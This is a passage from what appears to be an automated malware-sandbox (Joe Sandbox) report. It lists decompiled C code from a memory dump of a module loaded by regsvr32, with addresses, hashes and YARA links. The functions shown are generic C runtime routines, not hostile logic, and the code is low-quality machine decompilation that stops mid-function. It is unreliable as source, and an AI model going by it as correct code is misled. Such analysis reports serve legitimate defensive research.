				if (_v56 - 0x100 >= 0) goto 0xf9d2a901;
				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0xf9d2a879;
				_t225 = _a8;
				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
				goto 0xf9d2a8fc;
				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0xf9d2a8e5;
				_t226 = _a8;
				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
				goto 0xf9d2a8fc;
				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
				goto L1;
				goto 0xf9d2aa20;
				_v56 = 0;
				_v56 = _v56 + 1;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0xf9d2aa20;
				if (_v56 - 0x41 < 0) goto 0xf9d2a99c;
				if (_v56 - 0x5a > 0) goto 0xf9d2a99c;
				_v56 = _v56 + 1;
				__rcx = _a8;
				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
				_v56 = _v56 + 1;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
				_v56 = _v56 + 0x20;
				__ecx = _v56;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
				goto 0xf9d2aa1b;
				if (_v56 - 0x61 < 0) goto 0xf9d2aa04;
				if (_v56 - 0x7a > 0) goto 0xf9d2aa04;
				_v56 = _v56 + 1;
				__rcx = _a8;
				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
				_v56 = _v56 + 1;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
				_v56 = _v56 - 0x20;
				__ecx = _v56;
				__rdx = _a8;
				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
				goto 0xf9d2aa1b;
				__eax = _v56;
				__rcx = _a8;
				 *((char*)(_a8 + __rax + 0x11d)) = 0;
				goto L2;
				__rcx = _v24;
				__rcx = _v24 ^ __rsp;
				return E000007FE7FEF9D23280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
			}























                                0x7fef9d2a5e0
                                0x7fef9d2a5e0
                                0x7fef9d2a5ec
                                0x7fef9d2a5f6
                                0x7fef9d2a619
                                0x7fef9d2a61f
                                0x7fef9d2a62a
                                0x7fef9d2a635
                                0x7fef9d2a647
                                0x7fef9d2a658
                                0x7fef9d2a65f
                                0x7fef9d2a661
                                0x7fef9d2a671
                                0x7fef9d2a679
                                0x7fef9d2a687
                                0x7fef9d2a69c
                                0x7fef9d2a6a9
                                0x7fef9d2a6b0
                                0x7fef9d2a6bb
                                0x7fef9d2a6c2
                                0x7fef9d2a6d5
                                0x7fef9d2a6de
                                0x7fef9d2a6e6
                                0x7fef9d2a6e8
                                0x7fef9d2a6ea
                                0x7fef9d2a6fd
                                0x7fef9d2a70c
                                0x7fef9d2a715
                                0x7fef9d2a71a
                                0x7fef9d2a72f
                                0x7fef9d2a734
                                0x7fef9d2a747
                                0x7fef9d2a74b
                                0x7fef9d2a75b
                                0x7fef9d2a760
                                0x7fef9d2a770
                                0x7fef9d2a783
                                0x7fef9d2a788
                                0x7fef9d2a79b
                                0x7fef9d2a79f
                                0x7fef9d2a7af
                                0x7fef9d2a7b4
                                0x7fef9d2a7c4
                                0x7fef9d2a7ca
                                0x7fef9d2a7d7
                                0x7fef9d2a7dc
                                0x7fef9d2a7f2
                                0x7fef9d2a804
                                0x7fef9d2a81b
                                0x7fef9d2a828
                                0x7fef9d2a84b
                                0x7fef9d2a86d
                                0x7fef9d2a874
                                0x7fef9d2a88a
                                0x7fef9d2a897
                                0x7fef9d2a8ba
                                0x7fef9d2a8dc
                                0x7fef9d2a8e3
                                0x7fef9d2a8f4
                                0x7fef9d2a8fc
                                0x7fef9d2a901
                                0x7fef9d2a906
                                0x7fef9d2a91a
                                0x7fef9d2a91c
                                0x7fef9d2a92e
                                0x7fef9d2a93c
                                0x7fef9d2a946
                                0x7fef9d2a94f
                                0x7fef9d2a953
                                0x7fef9d2a960
                                0x7fef9d2a96a
                                0x7fef9d2a96e
                                0x7fef9d2a976
                                0x7fef9d2a981
                                0x7fef9d2a984
                                0x7fef9d2a98b
                                0x7fef9d2a993
                                0x7fef9d2a99a
                                0x7fef9d2a9a4
                                0x7fef9d2a9ae
                                0x7fef9d2a9b7
                                0x7fef9d2a9bb
                                0x7fef9d2a9c8
                                0x7fef9d2a9d2
                                0x7fef9d2a9d6
                                0x7fef9d2a9de
                                0x7fef9d2a9e9
                                0x7fef9d2a9ec
                                0x7fef9d2a9f3
                                0x7fef9d2a9fb
                                0x7fef9d2aa02
                                0x7fef9d2aa04
                                0x7fef9d2aa0b
                                0x7fef9d2aa13
                                0x7fef9d2aa1b
                                0x7fef9d2aa20
                                0x7fef9d2aa28
                                0x7fef9d2aa37

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Info
                                • String ID: $z
                                • API String ID: 1807457897-2251613814
                                • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                • Instruction ID: 4853ceba84ddbb230417778543f3b3b02ea2aa858227094ccd1c634e11d49f23
                                • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                • Instruction Fuzzy Hash: C8B1B77261CAC0CAD7B58B29E8807AFB7E0F388785F155125DAC983B99DB2DD4429F00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D34960 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 35%
                                			E000007FE7FEF9D34960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				char _v60;
				char _v64;
				signed int _v72;
				char _v80;
				char _v88;
				long long _v96;
				intOrPtr _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				signed int _v136;
				void* _t106;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				long long _t153;
				signed int _t161;
				signed int _t165;
				long long _t166;
				long long _t169;
				long long _t170;
				intOrPtr _t174;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_t153 = _a8;
				if ( *_t153 != 0x80000003) goto 0xf9d34990;
				goto 0xf9d34cc6;
				0xf9d24000();
				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0xf9d34a33;
				0xf9d24000();
				_v56 = _t153;
				E000007FE7FEF9D23D00(_t106);
				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0xf9d34a33;
				if ( *_a8 == 0xe0434f4d) goto 0xf9d34a33;
				if ( *_a8 == 0xe0434352) goto 0xf9d34a33;
				_v120 = _a64;
				_v128 = _a56;
				_v136 = _a40;
				if (E000007FE7FEF9D2E9B0(_a8, _a16, _a24, _a32) == 0) goto 0xf9d34a33;
				goto 0xf9d34cc6;
				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0xf9d34a43;
				goto 0xf9d34a48;
				E000007FE7FEF9D2CF80(_a40);
				_v120 = _a32;
				_v128 =  &_v60;
				_t161 =  &_v64;
				_v136 = _t161;
				r9d = _a48;
				r8d = _a56;
				E000007FE7FEF9D2EA30(_a16, _a40);
				_v72 = _t161;
				_v64 = _v64 + 1;
				_v72 = _v72 + 0x14;
				if (_v64 - _v60 >= 0) goto 0xf9d34cc6;
				if (_a48 -  *_v72 < 0) goto 0xf9d34c2b;
				_t165 = _v72;
				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0xf9d34c2b;
				_t117 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t165 + 4)), _t165);
				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34b53;
				_t118 = E000007FE7FEF9D2E680(_t117, _t166);
				_v48 = _t166;
				_t119 = E000007FE7FEF9D2E680(_t118, _t166);
				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
				_v40 = _t169;
				goto 0xf9d34b5f;
				_v40 = 0;
				if (_v40 == 0) goto 0xf9d34bff;
				_t120 = E000007FE7FEF9D2E680(_t119, _t169);
				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34be3;
				_t121 = E000007FE7FEF9D2E680(_t120, _t170);
				_v32 = _t170;
				E000007FE7FEF9D2E680(_t121, _t170);
				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
				goto 0xf9d34bef;
				_v24 = 0;
				_t174 = _v24;
				if ( *((char*)(_t174 + 0x10)) != 0) goto 0xf9d34c2b;
				E000007FE7FEF9D2E680( *((char*)(_t174 + 0x10)), _t174);
				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0xf9d34c30;
				goto L1;
				__eax = E000007FE7FEF9D2E680(__eax, __rax);
				_v72 =  *((intOrPtr*)(_v72 + 0x10));
				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
				__eflags = __rax;
				_v80 = 0;
				_v88 = 1;
				__rcx = _a64;
				_v96 = _a64;
				_v104 = _a56;
				__rcx = _v72;
				_v112 = _v72;
				_v120 = 0;
				_v128 = __rax;
				__rax = _a40;
				_v136 = _a40;
				__r9 = _a32;
				__r8 = _a24;
				__rdx = _a16;
				__rcx = _a8;
				__eax = E000007FE7FEF9D35180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
				goto L1;
				return __eax;
			}
































                                0x7fef9d34960
                                0x7fef9d34965
                                0x7fef9d3496a
                                0x7fef9d3496f
                                0x7fef9d3497b
                                0x7fef9d34989
                                0x7fef9d3498b
                                0x7fef9d34990
                                0x7fef9d3499d
                                0x7fef9d349a3
                                0x7fef9d349a8
                                0x7fef9d349ad
                                0x7fef9d349be
                                0x7fef9d349ce
                                0x7fef9d349de
                                0x7fef9d349e8
                                0x7fef9d349f4
                                0x7fef9d34a00
                                0x7fef9d34a2c
                                0x7fef9d34a2e
                                0x7fef9d34a3f
                                0x7fef9d34a41
                                0x7fef9d34a43
                                0x7fef9d34a50
                                0x7fef9d34a5a
                                0x7fef9d34a5f
                                0x7fef9d34a64
                                0x7fef9d34a69
                                0x7fef9d34a71
                                0x7fef9d34a89
                                0x7fef9d34a8e
                                0x7fef9d34a9b
                                0x7fef9d34aa8
                                0x7fef9d34ab5
                                0x7fef9d34ac9
                                0x7fef9d34acf
                                0x7fef9d34ade
                                0x7fef9d34ae4
                                0x7fef9d34af2
                                0x7fef9d34b0b
                                0x7fef9d34b0d
                                0x7fef9d34b12
                                0x7fef9d34b17
                                0x7fef9d34b46
                                0x7fef9d34b49
                                0x7fef9d34b51
                                0x7fef9d34b53
                                0x7fef9d34b68
                                0x7fef9d34b6e
                                0x7fef9d34b7c
                                0x7fef9d34b95
                                0x7fef9d34b97
                                0x7fef9d34b9c
                                0x7fef9d34ba4
                                0x7fef9d34bd9
                                0x7fef9d34be1
                                0x7fef9d34be3
                                0x7fef9d34bef
                                0x7fef9d34bfd
                                0x7fef9d34bff
                                0x7fef9d34c29
                                0x7fef9d34c2b
                                0x7fef9d34c30
                                0x7fef9d34c3a
                                0x7fef9d34c3e
                                0x7fef9d34c4b
                                0x7fef9d34c4e
                                0x7fef9d34c52
                                0x7fef9d34c52
                                0x7fef9d34c55
                                0x7fef9d34c5a
                                0x7fef9d34c5f
                                0x7fef9d34c67
                                0x7fef9d34c73
                                0x7fef9d34c77
                                0x7fef9d34c7c
                                0x7fef9d34c81
                                0x7fef9d34c8a
                                0x7fef9d34c8f
                                0x7fef9d34c97
                                0x7fef9d34c9c
                                0x7fef9d34ca4
                                0x7fef9d34cac
                                0x7fef9d34cb4
                                0x7fef9d34cbc
                                0x7fef9d34cc1
                                0x7fef9d34ccd

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID: MOC$RCC
                                • API String ID: 0-2084237596
                                • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                • Instruction ID: 969568d65f9d334bdbb71439fdfa9ac9293f65c07e2bfce327525da45f7ede8f
                                • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                • Instruction Fuzzy Hash: FA91193260DB8582DAA4DB55E49077EB3A0F7C4785F214526EACE83BA9CF3DE041CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3C6F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON
                                Download Yara Rule
                                C-Code - Quality: 19%
                                			E000007FE7FEF9D3C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t217;
				signed char _t222;
				intOrPtr _t257;
				signed int _t332;
				signed int _t333;
				signed long long _t336;
				intOrPtr* _t359;
				signed long long _t384;

				_t332 = __rax;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a708 = 7;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t332;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t332;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
				_t333 = E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				goto 0xf9d3c80e;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				goto 0xf9d3c84b;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
				if (_a824 >= 0) goto 0xf9d3c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0xf9d3c892;
				_t336 = _a824;
				_a832 = _t336;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
				_a832 = _a832 & _t336;
				if (_a116 >= 0) goto 0xf9d3c8d8;
				_a116 = 1;
				goto 0xf9d3c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0xf9d3c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t217 = _a116;
				_a116 = _a116 - 1;
				if (_t217 > 0) goto 0xf9d3c936;
				if (_a832 == 0) goto 0xf9d3c9d3;
				_a1040 = _a72;
				_a816 = _t217 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
				_t222 = _a816 + _a708;
				_a816 = _t222;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3c915;
				_a104 = _t222;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
				if (_a104 == 0) goto 0xf9d3ca12;
				if ( *_a64 == 0x30) goto 0xf9d3ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0xf9d3cc1d;
				if (_a104 <= 0) goto 0xf9d3cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0xf9d3cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0xf9d3cbe5;
				if (_a860 != 0) goto 0xf9d3cbf2;
				_a688 = 0xffffffff;
				goto 0xf9d3cc1b;
				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0xf9d3cb60;
				goto 0xf9d3cc3b;
				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0xf9d3cc8e;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3b99c;
				if (_a704 == 0) goto 0xf9d3ccb4;
				if (_a704 == 7) goto 0xf9d3ccb4;
				_a1060 = 0;
				goto 0xf9d3ccbf;
				_a1060 = 1;
				_t257 = _a1060;
				_a876 = _t257;
				if (_a876 != 0) goto 0xf9d3cd05;
				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t359;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t257 != 1) goto 0xf9d3cd05;
				asm("int3");
				if (_a876 != 0) goto 0xf9d3cd61;
				0xf9d2ab30();
				 *_t359 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3cd80;
				_a916 = _a688;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                0x7fef9d3c6f8
                                0x7fef9d3c6f8
                                0x7fef9d3c704
                                0x7fef9d3c70c
                                0x7fef9d3c719
                                0x7fef9d3c724
                                0x7fef9d3c737
                                0x7fef9d3c739
                                0x7fef9d3c748
                                0x7fef9d3c74c
                                0x7fef9d3c756
                                0x7fef9d3c769
                                0x7fef9d3c76f
                                0x7fef9d3c782
                                0x7fef9d3c78c
                                0x7fef9d3c791
                                0x7fef9d3c799
                                0x7fef9d3c7a9
                                0x7fef9d3c7b3
                                0x7fef9d3c7b8
                                0x7fef9d3c7c0
                                0x7fef9d3c7ce
                                0x7fef9d3c7d9
                                0x7fef9d3c7e8
                                0x7fef9d3c7ec
                                0x7fef9d3c7f4
                                0x7fef9d3c7fe
                                0x7fef9d3c806
                                0x7fef9d3c80e
                                0x7fef9d3c819
                                0x7fef9d3c823
                                0x7fef9d3c82a
                                0x7fef9d3c832
                                0x7fef9d3c83c
                                0x7fef9d3c843
                                0x7fef9d3c854
                                0x7fef9d3c85f
                                0x7fef9d3c86c
                                0x7fef9d3c878
                                0x7fef9d3c880
                                0x7fef9d3c882
                                0x7fef9d3c88a
                                0x7fef9d3c89d
                                0x7fef9d3c8aa
                                0x7fef9d3c8bf
                                0x7fef9d3c8cc
                                0x7fef9d3c8ce
                                0x7fef9d3c8d6
                                0x7fef9d3c8df
                                0x7fef9d3c8eb
                                0x7fef9d3c8ed
                                0x7fef9d3c8fe
                                0x7fef9d3c900
                                0x7fef9d3c910
                                0x7fef9d3c915
                                0x7fef9d3c91f
                                0x7fef9d3c925
                                0x7fef9d3c930
                                0x7fef9d3c93b
                                0x7fef9d3c95e
                                0x7fef9d3c96a
                                0x7fef9d3c997
                                0x7fef9d3c9a9
                                0x7fef9d3c9ab
                                0x7fef9d3c9bf
                                0x7fef9d3c9c9
                                0x7fef9d3c9ce
                                0x7fef9d3c9e0
                                0x7fef9d3c9ec
                                0x7fef9d3c9fc
                                0x7fef9d3ca03
                                0x7fef9d3ca10
                                0x7fef9d3ca1a
                                0x7fef9d3ca24
                                0x7fef9d3ca2d
                                0x7fef9d3ca36
                                0x7fef9d3ca45
                                0x7fef9d3ca52
                                0x7fef9d3ca54
                                0x7fef9d3ca59
                                0x7fef9d3ca61
                                0x7fef9d3ca6c
                                0x7fef9d3ca6e
                                0x7fef9d3ca73
                                0x7fef9d3ca7b
                                0x7fef9d3ca86
                                0x7fef9d3ca88
                                0x7fef9d3ca8d
                                0x7fef9d3caa5
                                0x7fef9d3cab5
                                0x7fef9d3cad0
                                0x7fef9d3caee
                                0x7fef9d3cafc
                                0x7fef9d3cb07
                                0x7fef9d3cb22
                                0x7fef9d3cb2c
                                0x7fef9d3cb37
                                0x7fef9d3cb3d
                                0x7fef9d3cb4d
                                0x7fef9d3cb59
                                0x7fef9d3cb70
                                0x7fef9d3cb79
                                0x7fef9d3cb8a
                                0x7fef9d3cb92
                                0x7fef9d3cb9b
                                0x7fef9d3cbb6
                                0x7fef9d3cbc9
                                0x7fef9d3cbd9
                                0x7fef9d3cbe3
                                0x7fef9d3cbe5
                                0x7fef9d3cbf0
                                0x7fef9d3cc11
                                0x7fef9d3cc16
                                0x7fef9d3cc1b
                                0x7fef9d3cc36
                                0x7fef9d3cc43
                                0x7fef9d3cc4e
                                0x7fef9d3cc69
                                0x7fef9d3cc74
                                0x7fef9d3cc80
                                0x7fef9d3cc85
                                0x7fef9d3cc8e
                                0x7fef9d3cc9b
                                0x7fef9d3cca5
                                0x7fef9d3cca7
                                0x7fef9d3ccb2
                                0x7fef9d3ccb4
                                0x7fef9d3ccbf
                                0x7fef9d3ccc6
                                0x7fef9d3ccd5
                                0x7fef9d3ccd7
                                0x7fef9d3ccde
                                0x7fef9d3cce3
                                0x7fef9d3cce6
                                0x7fef9d3ccf8
                                0x7fef9d3cd00
                                0x7fef9d3cd02
                                0x7fef9d3cd0d
                                0x7fef9d3cd0f
                                0x7fef9d3cd14
                                0x7fef9d3cd1a
                                0x7fef9d3cd23
                                0x7fef9d3cd3e
                                0x7fef9d3cd43
                                0x7fef9d3cd53
                                0x7fef9d3cd5f
                                0x7fef9d3cd68
                                0x7fef9d3cd74
                                0x7fef9d3cd97

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: 0$9
                                • API String ID: 1967237116-1975997740
                                • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                • Instruction ID: c0a57250e5e6ff09cb8cd0b3e72d4402f8dee1629557039505579d47a847bcbd
                                • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                • Instruction Fuzzy Hash: 1E41C87660DAC187E7B58B19E8917AEB7E4F385791F100125EBC886B98DBBDD540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3E70C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                C-Code - Quality: 23%
                                			E000007FE7FEF9D3E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
				signed int _t213;
				signed char _t218;
				void* _t249;
				intOrPtr _t257;
				signed int _t331;
				signed int _t332;
				signed long long _t335;
				intOrPtr* _t354;
				intOrPtr* _t359;
				signed long long _t389;

				_t331 = __rax;
				_a1220 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
				_a84 = 0x30;
				_a86 = _a1220 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t331;
				goto 0xf9d3e844;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t331;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
